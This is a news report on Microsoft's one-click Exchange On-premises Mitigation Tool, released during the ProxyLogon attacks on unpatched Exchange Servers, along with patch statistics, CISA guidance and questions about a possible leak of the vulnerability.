On Monday, Microsoft announced the rollout of a new one-click mitigation software aimed at shielding susceptible environments from the ongoing ProxyLogon cyberattacks targeting Exchange Servers. This tool, known as the Exchange On-premises Mitigation Tool (EOMT), employs PowerShell to implement necessary countermeasures against known vulnerabilities, specifically CVE-2021-26855. It also conducts scans using the Microsoft Safety Scanner to detect deployed web shells and to remediate any identified compromises.
According to Microsoft, this tool is primarily designed for customers who may be unfamiliar with the patch and update process or who have yet to apply critical security updates to their on-premises Exchange systems. The urgency of this rollout coincides with a surge in attacks by over ten sophisticated threat groups, most of whom are believed to be state-sponsored actors, who have been exploiting unpatched Exchange Servers worldwide. These actors have been responsible for deploying various attack methods, including backdoors, coin miners, and ransomware, exacerbated by the availability of proof-of-concept exploits in the wild.
Recent data from RiskIQ indicates that, as of March 12, 317,269 out of 400,000 global on-premises Exchange Servers have been patched, highlighting significant vulnerability hotspots in countries such as the United States, Germany, Great Britain, France, and Italy. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also amplified its guidance regarding the multiple variants of the China Chopper web shell exploited by malicious actors in these campaigns.
The rapid escalation of these attacks has prompted Microsoft to investigate the transition from initially targeted intrusions in early January to a broader exploitation campaign. One focus of their inquiry includes whether information about vulnerabilities leaked from a Microsoft partner inappropriately, impacting the scope of the attacks.
In parallel, there is speculation that some tools utilized in this campaign’s second wave closely resemble proof-of-concept code shared with antivirus partners on February 23. This raises questions about potential insider leaks but also suggests that threat actors may have independently discovered the same vulnerabilities to conduct covert reconnaissance before ramping up their exploits after sensing the impending patch release from Microsoft.
Microsoft emphasized that this situation represents the second significant incident involving nation-state actors in just four months, with the current vulnerabilities now attracting the attention of various criminal organizations engaging in new ransomware strategies and other malicious activities. The diverse tactics employed in the attacks are suggestive of multiple MITRE ATT&CK techniques, including initial access through exploitation of vulnerabilities, persistence via backdoor installations, and privilege escalation to gain deeper access within compromised networks.
Business owners must remain vigilant in the face of these evolving cyber threats, ensuring timely implementation of available patches and updates to protect their systems. As operational environments grow more complex, maintaining cybersecurity preparedness is essential in mitigating these risks.
